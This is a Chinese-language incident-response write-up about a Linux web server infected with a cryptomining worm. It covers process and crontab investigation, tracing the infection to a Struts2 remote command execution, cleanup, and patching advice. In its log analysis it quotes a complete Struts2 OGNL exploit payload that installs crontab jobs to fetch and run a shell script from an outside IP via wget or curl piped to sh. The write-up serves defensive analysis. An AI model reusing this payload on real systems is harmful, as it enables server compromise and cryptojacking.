0x00 前言

? 隨著虛擬貨幣的瘋狂炒作，利用挖礦腳本來實現流量變現，使得挖礦病毒成為不法分子利用最為頻繁的攻擊方式。新的挖礦攻擊展現出了類似蠕蟲的行為，並結合了高級攻擊技術，以增加對目標服務器感染的成功率，通過利用永恒之藍（EternalBlue）、web攻擊多種漏洞（如Tomcat弱口令攻擊、Weblogic WLS組件漏洞、Jboss反序列化漏洞、Struts2遠程命令執行等），導致大量服務器被感染挖礦程序的現象 。

0x01 應急場景

? 某天，安全管理員在登錄安全設備巡檢時，發現某臺網站服務器持續向境外IP發起連接，下載病毒源：

0x02 事件分析

A、排查過程

登錄服務器，查看系統進程狀態，發現不規則命名的異常進程、異常下載進程 :

下載logo.jpg，包含腳本內容如下：

到這裏，我們可以發現攻擊者下載logo.jpg並執行了裏面了shell腳本，那這個腳本是如何啟動的呢？

通過排查系統開機啟動項、定時任務、服務等，在定時任務裏面，發現了惡意腳本，每隔一段時間發起請求下載病毒源，並執行 。

B、溯源分析

? 在Tomcat log日誌中，我們找到這樣一條記錄：

對日誌中攻擊源碼進行摘錄如下：

{(#_=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh‘).(#iswin=(@java.lang.System@getProperty(‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

可以發現攻擊代碼中的操作與定時任務中異常腳本一致，據此推斷黑客通過Struct 遠程命令執行漏洞向服務器定時任務中寫入惡意腳本並執行。

C、清除病毒

1、刪除定時任務:

2、終止異常進程:

D、漏洞修復

? 升級struts到最新版本

0x03 防範措施

? 針對服務器被感染挖礦程序的現象，總結了幾種預防措施：

1、安裝安全軟件並升級病毒庫，定期全盤掃描，保持實時防護
2、及時更新 Windows安全補丁，開啟防火墻臨時關閉端口
3、及時更新web漏洞補丁，升級web組件

關於我：一個網絡安全愛好者，致力於分享原創高質量幹貨，歡迎關註我的個人微信公眾號：Bypass--，瀏覽更多精彩文章。

Linux應急響應（三）：挖礦病毒